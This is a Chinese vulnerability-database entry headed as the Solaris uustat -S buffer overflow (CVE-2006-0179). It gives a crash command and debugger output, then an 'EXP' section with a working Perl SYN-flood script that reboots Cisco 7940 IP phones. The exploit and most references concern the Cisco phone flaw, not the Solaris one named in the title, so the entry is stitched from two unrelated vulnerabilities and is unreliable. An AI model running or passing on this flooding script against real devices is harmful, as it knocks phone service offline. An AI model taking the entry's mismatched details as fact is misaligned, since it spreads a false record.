Sun Solaris uustat -S命令行参数溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109621 漏洞类型 缓冲区溢出
发布时间 2006-01-10 更新时间 2007-03-30
CVE编号 CVE-2006-0179 CNNVD-ID CNNVD-200601-107
漏洞平台 Hardware CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/1411
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-107
|漏洞详情
Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。Solaris的/usr/bin/uustat二进制程序中存在缓冲区溢出漏洞,成功利用这个漏洞的攻击者可以完全控制执行函数的返回地址,以uucp用户权限执行任意代码。如果"-S"命令行参数后的字符串长度大于或等于1152字节的话,就可能导致二进制程序崩溃。下面实例显示缓冲区被溢出,o1寄存器被字母A完全覆盖:bash-2.03%ls-l/usr/bin/uustat---s--x--x1uucpuucp62012Jan1716:07uustatbash-2.03$/usr/bin/uustat-S`perl-e'print"A"x3000'`SegmentationFaultbash-2.03$(gdb)inforegistersg00x00g10xff315e98-13541736g20x1cc00117760g30x4401088g40x00g50x00g60x00g70x00o00xff3276a8-13470040o10x414141411094795585...
|漏洞EXP
#!/usr/bin/perl
# This is made for trashing cisco 7940 ip phones. kokanin made/discovered this.
# A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my 
# phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!!
# not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny
# protocol - this is not for the SIP firmware.

use Net::RawIP;
use Time::HiRes;
$pkt = new Net::RawIP;
die "Usage $0 <src> <dst> <target port> <number of pkts> <packet delay>" unless ($ARGV[4]);
$pkt->set({
        ip => {
                saddr => $ARGV[0],
                daddr => $ARGV[1] 
                },
        tcp=> { dest => $ARGV[2],
                syn => 1,
                seq => 0,
                ack => 0}
        });
for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; };

# milw0rm.com [2006-01-10]
|参考资料

来源:VUPEN
名称:ADV-2006-0202
链接:http://www.frsirt.com/english/advisories/2006/0202
来源:SECTRACK
名称:1015488
链接:http://securitytracker.com/id?1015488
来源:SECUNIA
名称:18479
链接:http://secunia.com/advisories/18479
来源:XF
名称:cisco-ipphone-synflood-dos(24117)
链接:http://xforce.iss.net/xforce/xfdb/24117
来源:BID
名称:16200
链接:http://www.securityfocus.com/bid/16200
来源:OSVDB
名称:22469
链接:http://www.osvdb.org/22469
来源:CISCO
名称:20060113ResponsetoCiscoIPPhone7940DoSExploitpostedonmilw0rm.com
链接:http://www.cisco.com/warp/public/707/cisco-response-20060113-ip-phones.shtml
来源:MISC
链接:http://downloads.securityfocus.com/vulnerabilities/exploits/cisco_ip7940_dos.pl